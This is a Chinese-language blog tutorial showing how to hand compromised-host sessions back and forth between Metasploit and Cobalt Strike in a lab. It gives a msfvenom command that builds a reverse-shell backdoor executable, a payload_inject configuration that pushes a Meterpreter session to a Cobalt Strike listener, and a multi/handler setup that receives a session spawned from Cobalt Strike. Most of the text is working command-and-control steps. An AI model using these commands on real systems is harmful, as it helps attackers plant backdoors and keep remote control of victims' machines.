MSF与CS会话互相传递

作为C2工具,MSF和CS各有千秋,CS有着多种强大的自定义插件和易操作的图形化界面,而MSF集成了针对各类系统的Payload攻击代码,为了针对性的进行攻击,我们有时候会需要将MSF的会话转发到CS,或者相反

演示环境如下,MSF和CS部署在同一台主机上:

  • MSF:192.168.30.15
  • CS:192.168.30.15
  • 靶机:192.168.30.129

MSF转发CS

如果没有事先准备,可以用下面的执行生成一个后门文件上线

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.30.15 LPORT=8888 -f exe > shell.exe

上线后通过下面的指令将会话挂在到后台,方便我们回到MSF控制台进行会话转发操作

background

查看会话,确保有一个上线机器能让我们进行会话转发

image.png

然后在CS新增一个监听,其实不用特意新建,用原有做后门监听的监听器就可以

回到MSF,通过下面指令进行会话派送,其中主机地址和端口要设置的与上面我们创建的CS监听器一致

use exploit/windows/local/payload_inject
# payload类型与监听器监听的类型一致
set payload windows/meterpreter/reverse_http
# 设置CS主机地址和CS监听端口
set LHOST 192.168.30.15
set LPORT 38080
# 设置需要委派的会话编号
set session 3
# 禁止生成一个新的监听器用来服务payload连接
set DisablePayloadHandler true
exploit

运行后在CS可以看到MSF派送过来的会话,并且MSF原有会话不会丢失

image.png

CS转发MSF

一样,在上线前首先确保我们已有至少一个会话,我们就用上面获取的

image.png

新建一个监听器,用于转发会话到MSF,填入MSF的监听地址和端口,Payload选择Foreign类型

image.png

在MSF时输入下面的指令

msfconsole
use exploit/multi/handler
# payload类型与CS监听器一致
set payload windows/meterpreter/reverse_http
# 设置MSF本地监听地址
set LHOST 0.0.0.0
# 设置MSF自身监听的端口
set LPORT 4444
exploit

回到CS,右键会话点击新建会话(spawn),选择我们刚创建的MSF转发监听器,将会话转发到MSF

image.png

在MSF中可以看到收到CS的会话派送,可以在MSF中进行后渗透操作,并且CS中的原有会话不会丢失

image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值